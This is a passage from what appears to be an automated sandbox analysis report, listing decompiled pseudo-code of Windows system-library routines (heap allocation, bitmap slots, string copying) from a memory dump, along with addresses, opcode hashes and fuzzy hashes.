				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1747b9c; // 0x0
				_t55 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E016AD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1747b10 =  *0x1747b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x174536c; // 0x77f05368
					if( *_t51 != 0x1745368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1745368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x174536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0168A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                      0x0168a61c
                                                      0x0168a61e
                                                      0x0168a623
                                                      0x0168a628
                                                      0x0168a62b
                                                      0x0168a62d
                                                      0x0168a648
                                                      0x0168a64a
                                                      0x0168a64f
                                                      0x016c9b44
                                                      0x0168a6ec
                                                      0x0168a6f1
                                                      0x0168a6f1
                                                      0x0168a655
                                                      0x0168a657
                                                      0x0168a65a
                                                      0x0168a65d
                                                      0x0168a662
                                                      0x0168a663
                                                      0x0168a667
                                                      0x0168a668
                                                      0x0168a66d
                                                      0x0168a706
                                                      0x0168a706
                                                      0x016c9bda
                                                      0x016c9be6
                                                      0x016c9beb
                                                      0x00000000
                                                      0x016c9beb
                                                      0x0168a679
                                                      0x016c9b7a
                                                      0x00000000
                                                      0x016c9b7a
                                                      0x0168a683
                                                      0x0168a6f4
                                                      0x0168a6f7
                                                      0x0168a6f9
                                                      0x0168a6fd
                                                      0x0168a6a0
                                                      0x0168a6a0
                                                      0x0168a6ad
                                                      0x0168a6af
                                                      0x0168a6b4
                                                      0x016c9ba7
                                                      0x016c9bac
                                                      0x00000000
                                                      0x00000000
                                                      0x016c9bc6
                                                      0x016c9bce
                                                      0x016c9bd1
                                                      0x016c9bd3
                                                      0x016c9bd3
                                                      0x00000000
                                                      0x016c9bd1
                                                      0x0168a6bd
                                                      0x0168a6c3
                                                      0x0168a6c6
                                                      0x0168a6d2
                                                      0x0168a701
                                                      0x0168a704
                                                      0x00000000
                                                      0x0168a704
                                                      0x0168a6d4
                                                      0x0168a6d6
                                                      0x0168a6d9
                                                      0x0168a6db
                                                      0x0168a6e1
                                                      0x0168a6e6
                                                      0x0168a6e8
                                                      0x0168a6e8
                                                      0x0168a6ea
                                                      0x00000000
                                                      0x0168a6ea
                                                      0x0168a688
                                                      0x0168a692
                                                      0x0168a694
                                                      0x0168a699
                                                      0x00000000
                                                      0x00000000
                                                      0x0168a69d
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c60c51fbd01bae0ce954b55384168696e195be7a2f485f600c7159716024832
                                                      • Instruction ID: ef5546a1e9de091866dc3b15f0adc1013da3e826d9bd28978d931d06827af5fc
                                                      • Opcode Fuzzy Hash: 3c60c51fbd01bae0ce954b55384168696e195be7a2f485f600c7159716024832
                                                      • Instruction Fuzzy Hash: 4F418BB9A00215DFCB14DF98C880BA9BBF2FB89714F1581AEE904AB344C774A941CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0167C182, Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E0167C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01677D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01728D34(_v8, _t80);
					}
					E01672280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0166FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01728833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0166FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0169B180();
						if(_a4 != 0) {
							E01672280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0167BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0167BB2D(_t16, _t15);
						E0167B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0166FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0166FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0166FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                      0x0167c18d
                                                      0x0167c18f
                                                      0x0167c191
                                                      0x0167c19b
                                                      0x0167c1a0
                                                      0x0167c1d4
                                                      0x0167c1de
                                                      0x016c2d6e
                                                      0x0167c1e4
                                                      0x0167c1e4
                                                      0x0167c1e4
                                                      0x0167c1ec
                                                      0x016c2d7d
                                                      0x016c2d7d
                                                      0x0167c1f3
                                                      0x0167c1ff
                                                      0x016c2d88
                                                      0x016c2d8d
                                                      0x016c2d94
                                                      0x016c2d94
                                                      0x016c2d9f
                                                      0x016c2da4
                                                      0x016c2dab
                                                      0x016c2db0
                                                      0x016c2db2
                                                      0x016c2db3
                                                      0x016c2db4
                                                      0x016c2dbc
                                                      0x016c2dc3
                                                      0x016c2dc3
                                                      0x0167c205
                                                      0x0167c205
                                                      0x0167c208
                                                      0x0167c20e
                                                      0x0167c211
                                                      0x0167c216
                                                      0x0167c219
                                                      0x0167c21f
                                                      0x0167c222
                                                      0x0167c22c
                                                      0x0167c234
                                                      0x0167c23a
                                                      0x0167c23f
                                                      0x0167c245
                                                      0x0167c24b
                                                      0x0167c251
                                                      0x0167c25a
                                                      0x0167c276
                                                      0x0167c27d
                                                      0x0167c27d
                                                      0x0167c25c
                                                      0x0167c25c
                                                      0x00000000
                                                      0x0167c25e
                                                      0x0167c1a4
                                                      0x0167c1aa
                                                      0x0167c1b3
                                                      0x0167c265
                                                      0x0167c26c
                                                      0x0167c26c
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction ID: 73a647d28f5a4529996b2ccf72f1936823caed10cb73226f63cce42826746b8b
                                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                      • Instruction Fuzzy Hash: 78313772601547BED705EBB8DC90BE9FB99BF62200F0481AEC42C47301DB346A4ACBE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D7016, Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E016D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x174d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E016D6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E016D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01677D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01699AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0169B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01674620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                      0x016d7016
                                                      0x016d701e
                                                      0x016d702b
                                                      0x016d7033
                                                      0x016d7037
                                                      0x016d703c
                                                      0x016d703e
                                                      0x016d7041
                                                      0x016d7045
                                                      0x016d704a
                                                      0x016d7050
                                                      0x016d7055
                                                      0x016d705a
                                                      0x016d7062
                                                      0x016d7062
                                                      0x016d705a
                                                      0x016d7064
                                                      0x016d7064
                                                      0x016d7067
                                                      0x016d7071
                                                      0x016d7096
                                                      0x016d709b
                                                      0x016d70a2
                                                      0x016d70a6
                                                      0x016d70a7
                                                      0x016d70ad
                                                      0x016d70b3
                                                      0x016d70b6
                                                      0x016d70bb
                                                      0x016d70c3
                                                      0x016d70c3
                                                      0x016d70c6
                                                      0x016d70cd
                                                      0x016d70dd
                                                      0x016d70e0
                                                      0x016d70e2
                                                      0x016d70e2
                                                      0x016d70ee
                                                      0x016d7101
                                                      0x016d70f0
                                                      0x016d70f9
                                                      0x016d70f9
                                                      0x016d710a
                                                      0x016d710e
                                                      0x016d7112
                                                      0x016d7117
                                                      0x016d7118
                                                      0x016d7118
                                                      0x016d70bb
                                                      0x016d711d
                                                      0x016d7123
                                                      0x016d7131
                                                      0x016d7131
                                                      0x016d7136
                                                      0x016d713d
                                                      0x016d713e
                                                      0x016d713f
                                                      0x016d714a
                                                      0x016d714a
                                                      0x016d7084
                                                      0x016d7088
                                                      0x00000000
                                                      0x016d708e
                                                      0x016d708e
                                                      0x016d7092
                                                      0x00000000
                                                      0x016d7092

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 721b1afb94e800cb4f96b41a2759e69c76b7aa3e2f4dfdc35de88244a16c2eae
                                                      • Instruction ID: a58abf7e449ac7b39b196b4dc8d5e3f8b0103feb23fe9558525e3f2de27b756b
                                                      • Opcode Fuzzy Hash: 721b1afb94e800cb4f96b41a2759e69c76b7aa3e2f4dfdc35de88244a16c2eae
                                                      • Instruction Fuzzy Hash: B331A276A047519BC320DF68CD40A6AB7EAFF98704F044A2DF99587790E730E914CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168A70E, Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E0168A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1747b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1747b10 = 8;
					 *0x1747b14 = 0x1747b0c;
					 *0x1747b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0168A990(0x1747b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0168A840(__edx, __ecx, __ecx, _t52, 0x1747b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1747b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1747b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1747b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01674620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1747b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0169F3E0(_t50,  *0x1747b14, _t8 >> 3);
						_t28 =  *0x1747b14; // 0x0
						__eflags = _t28 - 0x1747b0c;
						if(_t28 != 0x1747b0c) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1747b14 = _t50;
						_t48 = _v12;
						 *0x1747b10 = _t9;
						goto L6;
					}
					 *0x1747b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                      0x0168a713
                                                      0x0168a714
                                                      0x0168a717
                                                      0x0168a71d
                                                      0x0168a720
                                                      0x0168a722
                                                      0x0168a727
                                                      0x0168a74a
                                                      0x0168a754
                                                      0x0168a75e
                                                      0x0168a768
                                                      0x0168a76a
                                                      0x0168a773
                                                      0x0168a78b
                                                      0x0168a790
                                                      0x0168a792
                                                      0x0168a741
                                                      0x0168a741
                                                      0x0168a743
                                                      0x0168a749
                                                      0x0168a749
                                                      0x0168a732
                                                      0x0168a73a
                                                      0x0168a797
                                                      0x0168a79d
                                                      0x0168a7a3
                                                      0x0168a7a9
                                                      0x0168a7b6
                                                      0x0168a7bc
                                                      0x0168a7ca
                                                      0x0168a7e0
                                                      0x0168a7e2
                                                      0x0168a7e4
                                                      0x016c9bf2
                                                      0x00000000
                                                      0x016c9bf2
                                                      0x0168a7ed
                                                      0x0168a7f2
                                                      0x0168a800
                                                      0x0168a805
                                                      0x0168a80d
                                                      0x0168a812
                                                      0x016c9c08
                                                      0x016c9c08
                                                      0x0168a818
                                                      0x0168a81b
                                                      0x0168a821
                                                      0x0168a824
                                                      0x00000000
                                                      0x0168a824
                                                      0x0168a7ae
                                                      0x00000000
                                                      0x0168a7ae
                                                      0x0168a73c
                                                      0x0168a73e
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0f4ee975d5d56bc08c18b0e88abd511f24dff84ed2fac81a9f38a24e4e04072
                                                      • Instruction ID: 45c21ed8740d65837a83ac526bccc95bb6384c7e78b6dcfe78b31bc72f80c0c3
                                                      • Opcode Fuzzy Hash: d0f4ee975d5d56bc08c18b0e88abd511f24dff84ed2fac81a9f38a24e4e04072
                                                      • Instruction Fuzzy Hash: C831B0B9600611EFD729EF58DC80F25BBFAFB84760F148A5BE60587344D770A902CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016861A0, Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E016861A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01685E50(0x16367cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01729D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0165F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                      0x016861b3
                                                      0x016861b5
                                                      0x016861bd
                                                      0x016861c3
                                                      0x016861c7
                                                      0x016861d2
                                                      0x016861ff
                                                      0x016861ff
                                                      0x01686201
                                                      0x01686207
                                                      0x01686207
                                                      0x016861d4
                                                      0x016861d9
                                                      0x00000000
                                                      0x00000000
                                                      0x016861df
                                                      0x016861e2
                                                      0x00000000
                                                      0x00000000
                                                      0x016861e6
                                                      0x016861e8
                                                      0x016861ee
                                                      0x016861ee
                                                      0x016861f9
                                                      0x016c762f
                                                      0x016c7632
                                                      0x016c7635
                                                      0x016c7639
                                                      0x016c7640
                                                      0x016c766e
                                                      0x016c7675
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7681
                                                      0x016c7689
                                                      0x016c768d
                                                      0x016c7691
                                                      0x016c7695
                                                      0x016c7699
                                                      0x016c76af
                                                      0x016c76b5
                                                      0x016c76b7
                                                      0x016c76b7
                                                      0x016c76d7
                                                      0x016c76dc
                                                      0x00000000
                                                      0x016c76dc
                                                      0x016c76a2
                                                      0x016c76a9
                                                      0x016c7651
                                                      0x016c7653
                                                      0x016c7653
                                                      0x016c7656
                                                      0x016c7656
                                                      0x00000000
                                                      0x016c7656
                                                      0x016c7644
                                                      0x016c7646
                                                      0x016c7648
                                                      0x016c7648
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58499251256a74d4bce6ce52917c666aafc74d6a163d1e0a4efa52a6ba12a7e2
                                                      • Instruction ID: c9bd8b5c59ffb0684c1aaca99eeb6d4179867ca585cdf3f74feff513e0e962c6
                                                      • Opcode Fuzzy Hash: 58499251256a74d4bce6ce52917c666aafc74d6a163d1e0a4efa52a6ba12a7e2
                                                      • Instruction Fuzzy Hash: 24318C716053118FE360DF1ECC00B26BBE5FB88B00F054A6DE9999B352E7B0E904CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165AA16, Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E0165AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x174d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1747b9c; // 0x0
					_t53 = L01674620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0169B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0169F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01666C59(_t53, _t51, _t58) != 0) {
							_t28 = E01685E50(0x163c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0168B230(_v32, _v28, 0x163c2d8, 1,  &_v24);
								_t28 = E0165F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                      0x0165aa25
                                                      0x0165aa29
                                                      0x0165aa2d
                                                      0x0165aa30
                                                      0x0165aa37
                                                      0x0165aa3c
                                                      0x016b4458
                                                      0x016b4458
                                                      0x016b4472
                                                      0x016b4474
                                                      0x016b4476
                                                      0x0165aa64
                                                      0x0165aa74
                                                      0x016b447c
                                                      0x016b4483
                                                      0x016b4492
                                                      0x0165aa52
                                                      0x0165aa54
                                                      0x0165aa5e
                                                      0x016b44a8
                                                      0x016b44ad
                                                      0x016b44af
                                                      0x016b44b6
                                                      0x016b44b6
                                                      0x016b44b9
                                                      0x016b44bc
                                                      0x016b44cd
                                                      0x016b44d3
                                                      0x016b44d6
                                                      0x016b44e1
                                                      0x016b44e1
                                                      0x016b44e6
                                                      0x016b44e8
                                                      0x016b44fb
                                                      0x016b44fb
                                                      0x016b44e8
                                                      0x00000000
                                                      0x0165aa5e
                                                      0x016b4476
                                                      0x0165aa42
                                                      0x0165aa46
                                                      0x0165aa48
                                                      0x0165aa4c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 523c3e3bfeadd761836f1f635f48645f210adec11876718bf9318932a2c68f7b
                                                      • Instruction ID: 490968103abc2c68294f5b5405ef77470af3fa9db1e5743b7523a8a9cf55a3f4
                                                      • Opcode Fuzzy Hash: 523c3e3bfeadd761836f1f635f48645f210adec11876718bf9318932a2c68f7b
                                                      • Instruction Fuzzy Hash: 2531B471A00119ABCF15AFA8CD81ABFB7B9EF44700F01416EF902E7250EB749951CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01694A2C, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E01694A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x174d360 ^ _t62;
				_v8 =  *0x174d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01672280(_t26, 0x1748608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0166FFB0(_t41, _t51, 0x1748608);
						L2:
						 *0x174b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0169B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01672280(_t28, 0x1748608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
